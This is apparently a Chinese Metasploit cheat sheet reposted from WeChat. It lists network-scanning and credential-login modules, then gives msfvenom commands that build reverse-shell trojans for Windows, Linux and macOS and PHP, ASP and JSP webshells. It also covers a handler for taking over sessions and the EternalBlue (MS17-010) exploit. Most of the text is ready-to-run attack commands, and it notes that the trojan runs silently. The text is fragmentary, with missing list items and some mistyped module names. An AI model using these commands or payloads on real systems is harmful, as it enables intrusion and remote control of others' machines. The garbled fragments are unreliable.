通过发送 ARP请求来枚举本地局域网中的所有活跃主机
📍
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.10.0/24
🎹
use scanner/discovery/udp_sweep
🎁
use auxiliary/scanner/telnet/telnet_login
🎼
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login_pubkey
use auxiliary/scanner/ssh/ssh_version
🎁
命令:auxiliary/scanner/smb/smb_enumusers
命令:auxiliary/scanner/smb/pipe_dcerpc_auditor
命令:auxiliary/scanner/smb/smb2
命令:auxiliary/scanner/smb/smb_enumshares
命令:auxiliary/scanner/smb/smb_enumusers
命令:auxiliary/scanner/smb/smb_login
命令:auxiliary/scanner/smb/smb_lookupsid
命令:auxiliary/scanner/smb/smb_version
✍️
1.ftp版本扫描
命令:scanner/ftp/ftp_version
📌
1.smtp枚举
命令:auxiliary/scanner/smtp/smtp_enum
2.扫描smtp版本
命令:auxiliary/scanner/smtp/smtp_version
🎁
1.模块搜索
命令:search scanner/portscan
2.通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
命令:auxiliary/scanner/protscan/ack
3.通过FTP bounce攻击的原理对TCP服务进行枚举
命令:auxiliary/scanner/protscan/ftpbounce
4.使用发送TCP SYN标志的方式探测开放端口
命令:auxiliary/scanner/protscan/syn
5.通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢
命令:auxiliary/scanner/protscan/tcp
6.一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤
命令:auxiliary/scanner/protscan/xmas
msfvenom -l可以列出MSFVenom可以生成的payload列表
msf中使用msfvenom生成payload。同时在msf生成木马时有四大要素:
🌰
3.监听主机、监听端口,监听使用就是metepreter。
🏆
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
🚅
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
🌅
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
这里的LHOST的地址就是攻击机的IP地址,而LPORT的端口就是攻击机的端口。
👍
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f exe > shell.exe
将构建号的payload文件发送到Windows系统中。
💡
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
直接双击运行,或者cmd运行等,都可以实现运行,运行并不会弹出窗口等。
sessions -i 1进行利用,这里的1是序号,可以通过上线的payload的序号进行利用
17.webshell脚本,生成webshell脚本
🥖
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
🏝️
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
💡
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
🍰
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
🌰
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f raw > shell.php
🦄
1.Windows7系统需要关闭防火墙,若开启防火墙可能会存在问题。
🍰
use auxiliary/scanner/smb/smb_ms17_010
📍
set rhosts 192.168.1.102 本机IP。
🎁
use exploit/windows/smb/ms17_010_eternalblue
原文始发于微信公众号(运维星火燎原):Metasploit工具部分模块使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
http://cn-sec.com/archives/4118332.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论